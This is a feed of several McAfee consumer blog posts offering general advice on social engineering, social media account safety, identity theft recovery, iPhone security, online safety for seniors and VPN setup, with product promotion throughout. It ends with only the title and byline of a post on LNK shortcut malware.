It’s Social Media Day! How are you celebrating? Reposting your very first profile picture from a decade ago? Sharing your...

The post It’s Social Media Day! Here’s How to Protect Yourself From Social Engineering Online appeared first on McAfee Blog.

]]>

It’s Social Media Day! How are you celebrating? Reposting your very first profile picture from a decade ago? Sharing your most-loved status update or the photo you’re most proud of? This year, consider commemorating the day by learning more about how to keep your information safe. Enjoy your favorite platform, but be on the lookout for scams, such as social engineering. 

What is Social Engineering 

Social engineering is a cybercrime common to social media sites. It is a tactic where a cybercriminal lurks on people’s social media pages, gleaning personal information that they then use to impersonate them elsewhere. 

With more than half of the global population on social media, you may think that a cybercriminal will never single you out from such a huge pool; however, it is possible.1 Luckily, you only have to make a few, easy changes to your online habits to keep your valuable private information just that: private. Check out these tips to make smart decisions and be more confident about your and your family’s online security. 

Why Do Cybercriminals Care About Social Media? 

Think of the types of posts you share with your dozens – or even hundreds or thousands! – of followers: updates about your life, where you live, work, or favorite travel destinations, your hobbies, pets, family members, etc. All of these details, that only you and those closest to you should know, are a valuable commodity to cybercriminals. Plus, now that social media shopping is growing in popularity, the credit card information linked to accounts is sweetening the deal for cybercriminals. 

Here are a few social engineering scams that are common to social media.  

Credential stuffing

People commonly create passwords based on things, places, and people that are important. Have you ever published a 20 questions-style get-to-know-me post? Those contain a lot of valuable personally identifiable information (PII). With just a few of those details about your personal life, cybercriminals can make educated guesses at your passwords, a tactic called credential stuffing. If they’re able to crack the code to one of your accounts, they’ll then input that password and login variations in several other sites, especially online banking portals, to see if they can gain entry to those too. 

Fake contests 

You’ve won! Send us your banking information and address, and you’ll receive a package in the mail or a direct deposit to your bank account!  

But did you enter a drawing for a prize? Very rarely does anyone win something just by being a follower of a certain page. If you receive a message similar to the above, it’s likely a phisher trying to draw more PII and sensitive banking information out of you. Or, the message may have links within it that redirect to an untrustworthy site. If you regularly enter social media contests, keep a list and only respond to legitimate ones. Also, never give your banking information out over social media, private messages, or email. 

Emotional messages and posts

There are plenty of valid fundraisers and petitions circulating around social media; however, there are just as many social engineering scams that dupe social media users because they inspire a strong emotion in them. For example, there have been several scams around Ukrainian donation sites. Cybercriminals often use fear, anger, or sadness to inspire people to open their wallets and share confidential banking information. 

How to Protect Yourself from Social Engineering

Luckily, all it takes is a few smart habits to stop social engineers in their tracks. Consider the following tips and make these small changes to your social media usage: 

Edit your follower or friend lists

At this point, you’ve probably had several of your social media accounts active for over a decade. That means it’s time to do some cleaning out of your friends and followers lists. It’s best to only accept requests from people you personally know and would actually like to keep in the loop about your life. A friend and follower request from strangers could be cyber criminals in disguise. Also, consider setting your account to private so that your posts are invisible to strangers. 

Slow down and think 

Social engineering hacks often bank on people acting rashly and quickly because of strong emotion, either excitement, fear, sadness, or anger. If you see a post on your newsfeed or receive a direct message that gives you a tight window to respond and asks for PII, slow down and think before acting. Double-check the destination of every link in the message by hovering over it with your cursor and checking the link preview at the bottom of your browser screen. Be careful, because some link previews include slight misspellings of legitimate websites. As a great rule of thumb, be automatically skeptical of direct messages from people you do not personally know. And if a DM from a friend seems out of the ordinary, shoot them a text to confirm they actually sent it. It could be that their social media account was hacked and a criminal is spamming their followers.   

Create strong, unique passwords or passphrases

A password manager will go a long way toward ensuring you have unique, strong passwords and passphrases for every account. Not reusing passwords makes credential stuffing impossible. McAfee True Key stores all your logins and passwords and guards them with one of the strongest encryption algorithms available. All you need to do is remember your master password. It’s a great practice to also enable multifactor authentication whenever a website offers it. This makes it incredibly difficult for a cybercriminal to break into your online accounts with their educated guesses at your password. 

Live More Confidently and Safely Online 

Now that you know what to look for and the best tricks to be safe, you can feel more confident that you’re doing everything you can to protect your online accounts and private information. McAfee Protection Score can also help you take control of your online safety. This service allows you to monitor your current online safety and encourages you to take specific steps to improve it. Now you can enjoy digitally keeping in touch with your friends with peace of mind! 

1Smart Insights, “Global social media statistics research summary 2022 

The post It’s Social Media Day! Here’s How to Protect Yourself From Social Engineering Online appeared first on McAfee Blog.

]]>
How to Protect Your Social Media Accounts https://www.mcafee.com/blogs/privacy-identity-protection/how-to-protect-your-social-media-accounts/ Wed, 29 Jun 2022 09:24:25 +0000 https://www.mcafee.com/blogs/?p=134239

Social media is part of our social fabric. So much so that nearly 50% of the global population are social...

The post How to Protect Your Social Media Accounts appeared first on McAfee Blog.

]]>

Social media is part of our social fabric. So much so that nearly 50% of the global population are social media users to some degree or other. With all that sharing, conversing, and information passing between family and friends, social media can be a distinct digital extension of ourselves—making it important to know how you can protect your social media accounts from hacks and attacks. 

Beyond the sheer number of people who’re on social media, there’s also the amount of time we spend on it.  People worldwide spend an average of 145 minutes a day on social media. With users in the U.S. spending just over two hours on social media a day and users in the Philippines spending nearly four hours a day, that figure can vary widely. Yet it’s safe to say that a good portion of our day features time scrolling and thumbing through our social media feeds. 

Given how much we enjoy and rely on social media, now’s a fine time to give your social media settings and habits a closer look so that you can get the most out of it with less fuss and worry. Whether you’re using Facebook, Instagram, TikTok, or whatnot, here are several things you can do that can help keep you safe and secure out there: 

1. Set strong, unique passwords

Passwords mark square one in your protection, with strong and unique passwords across all your accounts forming primary line of defense. Yet with all the accounts we have floating around, juggling dozens of strong and unique passwords can feel like a task—thus the temptation to use (and re-use) simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software will include one. 

2. Go private

Social media platforms like Facebook, Instagram, and others give you the option of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting, which can help protect your privacy. 

3. Say “no” to strangers bearing friend requests

Be critical of the invitations you receive. Out-and-out strangers could be more than just a stranger, they could be a fake account designed to gather information on users for purposes of cybercrime, or they can be an account designed to spread false information. There are plenty of them too. In fact, in Q3 of 2021 alone, Facebook took action on 1.8 billion fake accounts. Reject such requests. 

4. Think twice before checking in

Nothing says “there’s nobody at home right now” like that post of you on vacation or sharing your location while you’re out on the town. In effect, such posts announce your whereabouts to a broad audience of followers (even a global audience, if you’re not posting privately, as called out above). Consider sharing photos and stories of your adventures once you’ve returned.  

5. The internet is forever

It’s a famous saying for a reason. Whether your profile is set to private or if you are using an app with “disappearing” messages and posts (like Snapchat), what you post can indeed be saved and shared again. It’s as simple as taking a screenshot. If you don’t want it out there, forever or otherwise, simply don’t post it. 

6. Watch out for phishing scams

We’re increasingly accustomed to the warnings about phishing emails, yet phishing attacks happen plenty on social media. The same rules apply. Don’t follow any links you get from strangers by way of instant or direct messengers. And keep your personal information close. Don’t pass out your email, address, or other info as well. Even those so-called “quiz” posts and websites can be ruses designed to steal bits and pieces of personal info that can be used as the basis of an attack. 

7. Also keep an eye out for scams of all kinds

Sadly, social media can also be a place where people pull a fast one. Get-rich-quick schemes, romance cons, and all kinds of imposters can set up shop in ads, posts, and even direct messages—typically designed to separate you from your personal information, money, or both. This is an entire topic to itself, and you can learn plenty more about quizzes and other identity theft scams to avoid on social media 

8. Review your tags

Some platforms such as Facebook allow users to review posts that are tagged with their profile names. Check your account settings and give yourself the highest degree of control over how and where your tags are used by others. This will help keep you aware of where you’re being mentioned by others and in what way. 

9. Protect yourself and your devices

Security software can protect you from clicking on malicious links while on social media while steering you clear of other threats like viruses, ransomware, and phishing attacks. It can look out for you as well, by protecting your privacy and monitoring your email, SSN, bank accounts, credit cards, and other personal information. With identity theft a rather commonplace occurrence today, security software is really a must. 

10. Check your Protection Score and see how safe you are

Now you can point to a number that shows you just how safe you are with our Protection Score. It’s an industry first, and it works by taking stock of your overall security and grading it on a scale of 0 to 1,000. From there, it calls out any weak spots and then walks you through the steps to shore it up with personalized guidance. This way, you’re always in the know about your security, privacy, and personal identity on social media and practically wherever else your travels take you online.

The post How to Protect Your Social Media Accounts appeared first on McAfee Blog.

]]>
What to Do If Your Identity Has Been Stolen https://www.mcafee.com/blogs/privacy-identity-protection/what-to-do-if-your-identity-has-been-stolen/ Sun, 26 Jun 2022 01:13:39 +0000 https://www.mcafee.com/blogs/?p=134077

We live online these days, sharing everything from vacation pictures to what we eat for breakfast on the internet. The...

The post What to Do If Your Identity Has Been Stolen appeared first on McAfee Blog.

]]>

We live online these days, sharing everything from vacation pictures to what we eat for breakfast on the internet. The internet is also useful for daily activities, like buying groceries or paying bills.

While it’s convenient to connect with people and complete tasks online, cybercriminals are eager to use the internet to steal financial or personal data for their personal gain — otherwise known as identity theft. This is a criminal act and can affect your credit score in a negative way and cost money to fix. It can also affect employment opportunities since some employers conduct a credit check on top of drug testing and a criminal history check. Identity theft victims may even experience an impact to their mental health as they work to resolve their case.

The good news is that being able to recognize the signs of identity theft means you can act quickly to intervene and minimize any effects in case it happens to you. You can also protect yourself by using preventive measures and engaging in smart online behavior. This article provides essential information about identity theft, giving you the tools you need to become an empowered internet user and live your best life online.

5 steps to take if your identity has been stolen

The internet is a great place to be, but identity thieves hope to catch you off-guard and seek access to your personal information for their benefit. This could include private details like your birth date, bank account information, Social Security number, home address, and more. With data like this, an individual can adopt your identity (or even create a fake identity using pieces of your personal profile) and apply for loans, credit cards, debit cards, and more.

You don’t have to be kept in the dark, though. There are several signs that your identity has been stolen, from a change in your credit score to receiving unfamiliar bills and debt collectors calling about unfamiliar new accounts. If you suspect that you’ve been affected by identity fraud, you can act fast to minimize what happens. Here’s what to do.

File a police report

Start by contacting law enforcement to file a report. Your local police department can issue a formal report, which you may need to get your bank or other financial institution to reverse fraudulent charges. An official report assures the bank that you have been affected by identity fraud and it’s not a scam.

Before going to the police, gather all the relevant information about what happened. This could include the dates and times of fraudulent activity and any account numbers affected. Bringing copies of your bank statements can be useful. Also, make note of any suspicious activity that could be related. For example, was your debit card recently lost or your email hacked? The police will want to know.

Notify the company where the fraud occurred

You should also notify any businesses linked to your identity theft case. Depending on the type of identity theft, this could include banks, credit card companies, medical offices, health insurers, e-commerce stores, and more. For example, if someone used your credit card to make purchases on Amazon, alert the retailer.

Medical identity theft is another good example. In this case, a fraudster may assume your identity to gain access to health care services, such as medical checkups, prescription drugs, or pricey medical devices like wheelchairs. If someone uses your health insurance to get prescription drugs from a pharmacy, for instance, make sure to alert the pharmacy and your insurer.

File a report with the Federal Trade Commission

The Federal Trade Commission (FTC) is a government body that protects consumer interests. You can report identity theft via their portal, IdentityTheft.gov. They’ll then use the details you provide to create a free recovery plan you can use to address the effects of identity theft, like contacting the major credit bureaus or alerting the Internal Revenue Service (IRS) fraud department. You can report your case online or by calling 1-877-438-4338.

Ask credit reporting agencies to issue a fraud alert

A common consequence of identity theft is a dip in the victim’s credit score. For example, a cybercriminal may take out new lines of credit in the victim’s name, accrue credit card debt, and then not pay the balance. For this reason, contacting the credit monitoring bureaus is one of the most important steps to take in identity theft cases.

There are three main agencies: TransUnion, Equifax, and Experian. You can get a free credit report from each agency every 12 months via AnnualCreditReport.com. Check the report and note all fraudulent activity or false information and flag it with the relevant bureau’s fraud department. You should also initiate a fraud alert with each agency.

A fraud alert requires any creditors to verify your identity before opening a new line of credit. This adds an extra layer of security. An initial fraud alert lasts for 90 days. Once this expires, you can prolong your protection via an extended fraud alert, which will remain valid for seven years. You can notify one of the big three bureaus to set it up. They are then required to notify the other two bureaus.

A credit freeze is another smart move, which you can do through each of the three major credit bureaus. You can either call them or start the process online. This prevents people from accessing your credit report. Lenders, creditors, retailers, landlords, and others may want to see your credit as proof of financial stability. For example, if someone tries to open a phone contract under your name, the retailer may check the credit report. If there is a credit freeze in place, they won’t be able to view it and won’t issue the contract. If you need to allow someone access to your credit report, you can temporarily lift the freeze.

Change passwords to all of your accounts

Identity theft is often linked with leaked or hacked passwords. Even if you aren’t sure whether your passwords have been compromised, it’s best to play it safe. Change passwords to any affected accounts. Make sure to use strong passwords with a mix of numbers, letters, and symbols. Further, if there’s a chance to activate two-factor authentication on your accounts, this can provide added protection going forward.

Is it possible to prevent identity theft?

Ideally, you’ll never become the victim of identity theft, but things can happen. Cybercriminals work hard, but you can stay one step ahead by taking a few preventative measures. These include:

  • Learn how to recognize common scams. ID theft comes in many forms, from email phishing scams to social media snooping, device hacking, and data breaches. Learn the signs of a scam. For example, phishing emails are often poorly written and frequently follow certain formats, like claiming that an account of yours has been suspended.
  • Activate fraud alerts. Most financial institutions provide alerts about suspected fraudulent transactions, sending you a notification via phone call, text, or email if they notice suspicious activity on your account. The bank may also freeze an account automatically until any potentially unauthorized charges are clarified and confirmed by the account owner.
  • Protect your devices with strong passwords. Your devices, including your phone, tablet, and laptop, should all be password-protected. In case one of your tech tools is stolen, it will be harder for fraudsters to gain access to your personal data. Set strong passwords with a mix of letters, numbers, and symbols. Make sure they don’t include information a person could figure out easily, like your home address or birthday.
  • Use different passwords for different accounts. Any online accounts you use, from your banking app to your email, should be password-protected. Follow the same rules for setting strong passwords, but don’t duplicate passwords. If a hacker cracks the code for one account, they can easily guess their way into your other accounts. A password manager can help you stay on top of your passwords by encrypting them and storing them safely for easy tracking. McAfee Identity Protection includes a password manager that can secure your account credentials across devices.
  • Protect your documents. Protect hard copies of sensitive documents, like your Social Security card and birth certificate, by keeping them locked away. Also, dispose of documents with personal data by shredding them. This ensures that dumpster divers can’t access your information. Documents to shred might include invoices, bank statements, medical records, canceled checks, and junk mail with your name, phone number, and address.
  • Don’t overshare on social media. Social media is a great way to connect with friends and family, but it can also be a goldmine for identity thieves. Avoid sharing details like your kids’ or pets’ names, which are often used in passwords. Sensitive information, like a home address or birthday, can also be used to build a fake identity. You may want to set your social media accounts to private in addition to limiting what you share.
  • Review your credit report. You have the right to one free copy of your credit report every 12 months, which you can request via AnnualCreditReport.com. This provides you with a report from each of the three major credit bureaus. Review the report, verifying personal information, account details, and public records (like bankruptcies or liens) to ensure there isn’t anything suspicious.
  • Follow the news. When major corporations are targeted by hackers, they’re required to alert affected consumers. These breaches are also often reported in the media. To take a more proactive approach, though, check out the McAfee blog, which reports on breaches. If a business you use has been affected, change your passwords.

You can further protect yourself with antivirus software like McAfee’s Total Protection plan. This can help protect your devices against spyware and viruses. You can also enhance your network security with a firewall and virtual private network (VPN). A firewall controls traffic on your internet network based on predefined security parameters, while a VPN hides your IP address and other personal data.

Sign up for a protection plan today

Don’t let concerns about identity fraud keep you from enjoying all the conveniences and perks the internet offers. McAfee’s identity theft protection services can help you stay connected while keeping you safe. Tailor your package to your household’s needs to get the safeguards you want, like ID theft coverage, VPN, and 24/7 monitoring. Our Total Protection plan also comes with $1 million in identity theft coverage to cover qualifying losses and hands-on support to help you reclaim your identity.

With McAfee by your side, you can stay online confidently.

The post What to Do If Your Identity Has Been Stolen appeared first on McAfee Blog.

]]>
Does an iPhone Need Antivirus Software? https://www.mcafee.com/blogs/tips-tricks/does-an-iphone-need-antivirus-software/ Fri, 24 Jun 2022 10:45:55 +0000 https://www.mcafee.com/blogs/?p=151138

If you’re one of the countless Apple iPhone owners out there, there’s a good chance that one of the reasons...

The post Does an iPhone Need Antivirus Software? appeared first on McAfee Blog.

]]>

If you’re one of the countless Apple iPhone owners out there, there’s a good chance that one of the reasons you love your smartphone is because you’ve heard that Apple devices tend to have fewer vulnerabilities to viruses.  

Because of their shared operating system, iOS devices enjoy Apple’s security measures, which keeps them protected from malware and viruses differently from most Android devices 

This is great, right? Certainly! But it’s also important to remember that nothing digital or internet-related is ever foolproof, and while it’s rare, even iOS operating systems can be affected by malicious software 

The great news is that protecting yourself from iPhone viruses and hackers isn’t hard. Read on to learn more. 

Can iPhones get viruses?

Although Apple has designed its iOS system to be pretty untouchable, it’s still possible to get a virus on your iPhone 

The biggest way this can happen is through something called “jailbreaking,” which is when you bypass the restrictions on the Apple operating system. You might do this to gain more control over your device, downloading any apps or programs from anywhere on the internet. It basically lets you do whatever you want with your iPhone. 

A major reason that mobile security is so seamless with Apple’s iOS is that — unlike Android and Microsoft Windows products — Apple devices are designed to work only inside set parameters that “talk” exclusively to other approved Apple apps or devices.  

This is all controlled by Apple encryption, making your iPhone security rather impervious to malicious apps. You might also notice that there are no antivirus apps in the App Store, which isn’t a coincidence! 

But when you jailbreak an iPhone, this means you’ve opened the iOS to a wider range of apps, features, and themes — none of which are approved by Apple 

So, you won’t benefit from the virus protection that comes from having a closed system, meaning you can expose your iPhone to adware, scams, and other internet security issues that Apple permissions blocked. 

Potential threats to your iPhone

So, you’ve jailbroken your iPhone and are out of Apple’s famously closed sandbox. While it’s not an ideal situation, it’s not the end of the world. You may need antivirus protection now. This is especially true if you frequently use public Wi-Fi 

Here are a few potential threats that a jailbroken iPhone might face: 

  • Phishing: Unfortunately, malicious websites don’t come with a fraudulent website warning. Phishing happens when a cybercriminal sends a fraudulent message aimed at getting you to reveal important data like your personal or financial information. If your iPhone is successfully phished, private data on the iCloud and your device can be compromised. 
  • Ransomware: Unsecured Wi-Fi networks can expose connected devices to ransomware. This type of malware threatens users with permanently blocked access to their devices unless they pay a certain amount of money. Some ransomware programs will even try to coerce money from users by warning that private information will be published if they don’t pay a ransom. 
  • Malware: The reason so many different security apps and antivirus programs exist is that malware is everywhere. It also comes in many forms! Malware is a general term used to describe any software program intended to gain unauthorized access to a computer system or device. Malware can disrupt or disable a device, network, or specific user. It can also actively leak private information and create privacy concerns. 

5 signs your iPhone has a virus

If you’re worried about the Wi-Fi you used at a coffee shop last week and are searching for the “best antivirus protection for Apple,” don’t curse that java-inspired Safari surf just yet.  

There are a few telltale signs that your iPhone or another Apple device has been infected with a virus. They include: 

  • Overheating: Being out in the extreme sun or having an old battery can be culprits for overheating. But if you’re repetitively seeing that feverish red thermometer on your screen, your iPhone could be letting you know it’s infected with malicious software. 
  • Unexplained data usage: If you don’t have an unlimited phone plan, you probably keep a pretty close eye on data usage. So, if you see big increases in usage that don’t match your activity, this could be a sign that your iPhone may have a virus. 
  • Pop-ups: Sometimes, there’s no escaping those pesky “look at me” boxes that pop up when you’re online. But seeing many pop-ups can indicate that your Apple device is harboring unwanted guests. You can minimize pop-ups by using a virtual private network like McAfee Secure VPN. 
  • Suspicious apps: Make a habit of scrolling through your list of apps from time to time. This could be a red flag if you see anything that you don’t remember downloading yourself or that didn’t come with your iPhone. 
  • Quick battery drainage: If your iPhone is older or has many big apps, your battery will typically drain faster. But it could also mean an unwanted and unseen program is running in the background. 

How you can protect your iPhone

The first and best way to protect your Apple device from cybersecurity concerns is to avoid jailbreaking it. While an iPhone might be limited in what apps and themes you can enjoy, its built-in security features really can’t be beaten.  

Here are some other ways you can keep your iPhone safe from malware and viruses: 

  • Keep software updated. Each new version of Apple iOS has patches for security holes discovered by Apple’s internal hackers. Be sure to keep your iPhone software up to date to make sure you’re enjoying the latest security features. You can even set up automatic software updates to make things easier. 
  • Set up USB restricted mode. Protect your data from “juice jacking,” which is when someone steals your data through your phone’s USB port as it’s plugged into a public charger. Head to “Settings” and then to “Face ID and Passcode.” Enter your passcode and toggle “USB Accessories.” 
  • Use a password manager. A password manager like McAfee True Key can lend several additional layers of security to Apple’s already highly encrypted operating system. Consider a password management system that can help you create strong passwords and uses biometric security features like fingerprint recognition. 
  • Enable Touch ID. This may seem like an old-school feature compared to facial recognition. But having touch ID enabled can reduce the chances of someone gaining unauthorized access to your iPhone since it requires your physical presence to open it.  
  • Use a VPN. If you use public Wi-Fi a lot, you risk exposing your personal information. McAfee Secure VPN uses bank-grade encryption to keep your data protected while you live your life online — no matter where you are. 
  • Consider antivirus software. Antivirus software can handle many potential vulnerabilities by looking out for online threats like hackers. McAfee antivirus software offers real-time threat protection across multiple devices and can help keep your iPhone free of data breaches. 

Keep your everyday devices secure 

In this day and age, we all live on our devices. And while it’s great to have the built-in security of Apple’s iOS, why settle for just one line of defense?  

For complete protection against malicious software like viruses, malware, and more, look to McAfee Total Protection. Our all-in-one approach means you’re shielded from data breaches, have access to a secure VPN, and can receive up to $1 million in identity theft coverage. The best part is that it works for multiple devices, including Mac OS and iOS 

Enjoy the peace of mind that comes with having McAfee in your corner.  

 

The post Does an iPhone Need Antivirus Software? appeared first on McAfee Blog.

]]>
Online Safety for Seniors – How to Keep Older Family Members Safe Online https://www.mcafee.com/blogs/family-safety/online-safety-for-seniors-how-to-keep-older-family-members-safe-online/ Thu, 23 Jun 2022 13:27:23 +0000 https://www.mcafee.com/blogs/?p=155059

Heard of the sandwich generation? Well, if you’ve got a tribe of kids and parents who are aging then you...

The post Online Safety for Seniors – How to Keep Older Family Members Safe Online appeared first on McAfee Blog.

]]>

Heard of the sandwich generation? Well, if you’ve got a tribe of kids and parents who are aging then you are a fully-fledged member! And as members of this special club, not only do we need to manage and keep our offspring in check, but we also have to reserve some energy to help our parents navigate life’s challenges which of course includes the online world. 

In the broadest sense, the sandwich generation is the ‘caught in the middle’ generation who have living parents and children to care for. More often than not, it’s people like us, smack-bang in middle age, who support both their parents and children financially, physically, and/or emotionally. And with life expectancies looking rosier than ever and many of us choosing to have careers before we become parents, it’s inevitable that us middle-aged folks are feeling a little squeezed at both ends! 

Digital Parenting Can Feel All Consuming 

Getting our head around keeping our kids safe online can feel overwhelming for many of us. Keeping up with the latest apps, games and platforms can often feel relentless and let’s not forget about trying to weave in cyber safety messages to ensure our kids make safe decisions online too. But when the downside of not being vigilant about online safety is so great, it’s essential that we extend our digital education messages to the older members of the family too! 

Over 90% of Aussie Seniors are Connected to the Internet 

One of the silver linings of the pandemic is that it gave a real push to those who were resisting getting online. And in most cases, that was the older member of our society. Research from ACMA shows that by 2020, over 90% of Australian seniors had internet connectivity in their homes compared to 68% in 2017. But as we all know, owning a car and driving it are 2 very different tasks!  

My parents, who are both in their late 70’s, do a pretty good job of managing their online lives. They bank online, are avid email senders and can even do a little Facetime, thanks to COVID! But they are a work in progress – like everyone. And while I try very hard to keep them up to date with new apps and risks, I have learnt over the years that less is more. That not overwhelming them is actually the key. In fact, the simpler I keep my updates and tips, the more likely they are to get onboard with my message.  

So, in the spirit of the experience with my much-loved mum and Dad, I‘d like to share with you the top things you can do to keep your much loved older family members safe when they go online. 

1. Invest in Protection Software 

I accept that there are no real guarantees in life but there are risk-minimizing decisions. And ensuring all devices have top-level security software is one of those. Not only will this protect your loved ones from downloading viruses and malware, but it will also allow them to shop with confidence at approved ‘safe’ websites, help them manage their passwords, locate their devices plus loads more. It’s such a small price to pay for increased peace of mind. Check out McAfee+ protection which can protect your family’s entire fleet of devices. 

2. It’s All About Passwords 

A secure password is a key to keeping one’s online life safe so taking some time to formulate a strategy for older family members is so worthwhile. Downloading a password manager was a total life changer for me. Not only did it help me create complex passwords that no human could ever generate but it remembers them for me too. I only have to remember the master password and it then automatically logs me in! Now, if this was set up carefully for older family members, this could be an amazing tool to protect their online life.  

I am also very aware that writing down passwords ‘in a special book’ is used very commonly. And if this is the only way that will work for your family members then try to make these passwords as complex as possible without overwhelming them. A complex, nonsensical sentence would work well here but just ensure each account has its own sentence in case the account gets hacked.      

3. Software Updates 

Out-of-date software is a little like leaving your front door unlocked – it makes it far easier for unwanted visitors. In almost every case, a software update includes a patch for a security vulnerability – a weak hole in the company’s software that could expose the user to risk. So, when I discovered that my parents were ignoring reminders for updates as they had become very annoying, I sprang into action! Most software updates can be automated so I strongly encourage taking some time to ensure all the software your family members use is set up to update automatically. 

4. ScamWatch 

Unfortunately, older Aussies are often the target of online scams. Scammers will work overtime to get their trust with the aim of extracting dollars or their personal details. I wish I had a silver bullet that would protect all vulnerable types from these cybercrims, but I don’t. The next best option is to talk about scams and some of the sneaky techniques scammers will use with them. I remind my parents regularly not to reply to emails from people they don’t know, not to even answer calls from numbers they aren’t familiar with and that if they receive a call from their bank and they aren’t sure whether it is legitimate, ask for the caller’s number so you can ring them bank – if the caller is legit, that won’t be a problem.  

If you think about it, keeping your older family members only is simply an extension of keeping your kids safe. The messages and strategies are almost identical! So, if your older family members use a Messenger app, why not set up a family group chat with both the younger and older family members? You can share news stories about online risks and better still, get the kids involved too! So, next time your parents have an issue with their phone – the kids will be able to help out! Awesome!! 

Take care 

Alex xx 

The post Online Safety for Seniors – How to Keep Older Family Members Safe Online appeared first on McAfee Blog.

]]>
How to Set Up a VPN https://www.mcafee.com/blogs/tips-tricks/how-to-set-up-a-vpn/ Wed, 22 Jun 2022 10:17:53 +0000 https://www.mcafee.com/blogs/?p=151132

In today’s connected world, you can do so much on the internet. It’s never been easier to stay entertained (Netflix,...

The post How to Set Up a VPN appeared first on McAfee Blog.

]]>

In today’s connected world, you can do so much on the internet. It’s never been easier to stay entertained (Netflix, anyone?), informed, and productive. But it’s important to keep your online activities private and safe, whether you’re checking social media, using a streaming service, or banking online.  

With the right solutions, you can have a worry-free online experience. 

Thankfully, virtual private network (VPN) software keeps your data secure by hiding your IP address (the address your device uses to access the network). In this article, discover the benefits of a VPN, learn how to set one up, and review some things to consider when looking for the right VPN solution for you. 

What is a VPN?

A virtual private network (VPN) is software that protects your internet connection by keeping your IP address secure and anonymous. Essentially, it opens a private tunnel just for you!  

It does this by making a secure connection between your internet-connected device and a remote VPN server. It also encrypts the information you upload onto the internet, preventing others from intercepting it.  

This means you can feel confident surfing the web without worrying about other people uncovering your location, identity, or online activity 

Benefits of a VPN

A perfect digital world wouldn’t have malware, website trackers, ISP data throttling, or prying eyes. Thankfully, investing in a good VPN can help you overcome a lot of these challenges.  

Here’s a little more detail about the benefits of a VPN: 

  • Stay safe by blocking malware. Depending on the type of VPN you use, it may come with a feature that blocks malware. This functionality adds another protective layer to your network, like some sort of firewall, so you don’t lose sleep over malicious software. 
  • Beat the ISP throttling blues. VPNs provide a practical way to stop your internet service provider from throttling your bandwidth or data. Without throttling, you can enjoy maximum internet speeds even after you’ve reached your data or bandwidth limit. 
  • Outsmart website trackers. Mobile apps and websites work tirelessly to record information about your online activity. This practice can be bothersome if you’re a stickler for privacy. A VPN keeps the trackers guessing about the nature of your information thanks to advanced encryption. 
  • Protect yourself on public Wi-Fi. If you regularly connect to the internet via public Wi-Fi, it’s important to stay safe using a VPN. An unsecured public Wi-Fi network provides an easy way for criminals to steal sensitive information like your credit card number and passwords. There’s no need to worry about anyone seeing or stealing your data when you use a VPN. 

How to set up a VPN server

Investing in the right tools is a surefire way to make yourself feel less vulnerable to online risks. Rather, you’ll feel empowered to enjoy a care-free online experience.  

McAfee® Safe Connect VPN is one such tool that gives you the freedom to enjoy all the good things that the internet offers without worrying about online privacy or safety. 

This tool works on multiple platforms, including Microsoft Windows, macOS, Android, and iOS. More importantly, McAfee Safe Connect VPN is easy to set up on different devices, allowing you to benefit from bank-grade AES 256-bit encryption. So, you can browse the internet using Chrome or another browser and connect via public Wi-Fi without losing sleep over vulnerability to risks. 

Depending on your preferences, it’s possible to set up a VPN automatically or manually. We discuss the steps to set up a VPN manually in the sections below. 

Set up a VPN connection on Windows

Easy setup and connection to a VPN server are key factors when choosing the right tool or software for your needs. On a Windows 10 system, just follow a few steps to establish a secure and stable connection. 

  1. Search for the virtual private network on Cortana. 
  2. Then, go to the VPN settings and select the plus sign (“+”). 
  3. On the drop-down menu that appears, select “Windows built-in.” (The system automatically sets the VPN type to automatic. You can change it to VPN protocols like PPTP, TCP, SSTP, L2TP/IPsec, or IKEv2.) 
  4. In the next fields, add VPN configuration details from your VPN provider (in this case, McAfee Safe Connect VPN). 
  5. Once you’ve completed filling in the details, click “Save” and then “Next.” 
  6. In the last step, select the McAfee VPN connection, and you’re done! 

Set up a VPN connection on a Mac

The next time you need to set up a VPN on a Mac computer, you’ll be pleased to know that the setup steps are short and sweet. 

Here’s what you need to do. 

  1. Start by clicking “Network” under “System Preferences.” 
  2. Next, click on the “+” sign and select “VPN.” 
  3. In the pop-up interface that appears, add details like connection name, server address, VPN type, server name, and authentication settings for advanced options. 
  4. In the final step, click “Apply” and “OK” to finish. 

5 things to look for in a VPN

Picking the best VPN solution that takes care of your privacy needs involves ticking various boxes based on the features and functionality that matter most to you. 

Here are some things to look for in a virtual private network: 

  • The number of servers: A good VPN should offer a selection of servers that can handle a lot of traffic without undermining connection speeds. 
  • Robust data encryption: Converting data into a code is what makes a good VPN tick. So, opt for a VPN with the latest encryption technology, such as AES 256-bit encryption offered by McAfee SafeConnect VPN. 
  • Server location: The VPN service should also offer servers located in various regions depending on your connection requirements. Nearby service can reduce lag, particularly when you want to engage in online gaming. And sometimes, you need a VPN server from another region or country to get around geo-blocking. 
  • Excellent tech support: The right VPN solution should come with good technical support to help you find answers to any questions you may have. 
  • Ease of use: A good VPN client should be easy to set up and use so you can focus on your online activities rather than tweaking the VPN settings. 

Can you use a VPN on mobile devices?

If you have a mobile device like an Apple iPhone or Android device, you can also enjoy the benefits that come with using a VPN.  

Setting up and using a VPN like McAfee’s Safe Connect VPN on an Android device or iOS platform is super easy. Just download the VPN from the app store or the McAfee website, and you’re good to go.  

McAfee offers both a free VPN (with 250 MB of free data every month and protection for one device) and paid subscription plans that come with unlimited data and protection for up to five devices. You can also enjoy a 30-day free trial to see if it’s the right VPN for you. 

It’s usually fine to just use the default settings, too, so you don’t have to do anything else other than login. 

Keep your browsing private

Hiding your IP address and maximizing privacy has never been easier thanks to virtual private networks. These tools can also protect you from prying eyes by converting the information you upload to the internet into code using advanced encryption technology.  

VPNs have several advantages, including getting around website trackers used by advertisers to monitor your online activities. Another thing to remember is that it’s relatively easy to set one up no matter your operating system 

If you’re looking for the right VPN solution for you, consider McAfee Secure VPN — included in McAfee Total Protection — which comes with the latest encryption technology. Whether you install the software on your mobile or desktop device, you can be confident that you and your family’s sensitive data is secure.  

The post How to Set Up a VPN appeared first on McAfee Blog.

]]>
Rise of LNK (Shortcut files) Malware https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/ Tue, 21 Jun 2022 18:58:20 +0000 https://www.mcafee.com/blogs/?p=155118

Authored by Lakshya Mathur An LNK file is a Windows Shortcut that serves as a pointer to open a file,...

The post Rise of LNK (Shortcut files) Malware appeared first on McAfee Blog.

]]>

Authored by Lakshya Mathur

